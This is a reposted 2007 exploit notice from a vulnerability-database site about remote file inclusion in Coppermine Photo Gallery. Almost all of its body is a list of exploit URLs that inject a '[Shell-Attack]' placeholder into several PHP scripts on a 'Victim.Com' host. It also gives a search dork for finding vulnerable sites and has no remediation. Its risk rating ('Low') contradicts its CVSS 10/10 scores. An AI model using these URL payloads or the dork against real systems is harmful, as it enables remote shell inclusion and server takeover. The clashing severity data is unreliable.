Remote File Include In Script Coppermine Photo Gallery

2007-03-13 / 2007-03-14
Credit: RaeD Hasadya
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

By Hasadya Raed Contact : RaeD (at) BsdMail (dot) Com [email concealed] ------------------------------------ Script : Coppermine Photo Gallery Expl : Remote Include File Dork : "Copyright (c) 2003-2006 Coppermine Dev Team" ------------------------------------ B.Files : image_processor.php functions.php picmgmt.inc.php plugin_api.inc.php index.php Exploits : http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack] http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Atta ck] http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Att ack] http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell -Attack] http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack] http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack] ---------------------------------------- By Hasadya Raed -- _______________________________________________ Get your free email from http://bsdmail.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top